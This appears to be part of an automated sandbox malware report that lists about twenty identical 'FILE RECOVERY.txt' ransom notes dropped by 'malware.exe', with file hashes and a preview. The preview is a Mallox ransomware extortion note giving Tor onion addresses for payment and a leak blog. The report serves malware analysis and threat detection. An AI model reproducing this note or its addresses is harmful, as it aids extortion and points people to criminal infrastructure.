                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280815\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310093\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314559\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\353694\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\353698\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000045\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000105\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000161\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000163\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000165\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\onesettings_waas_featuremanagement\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
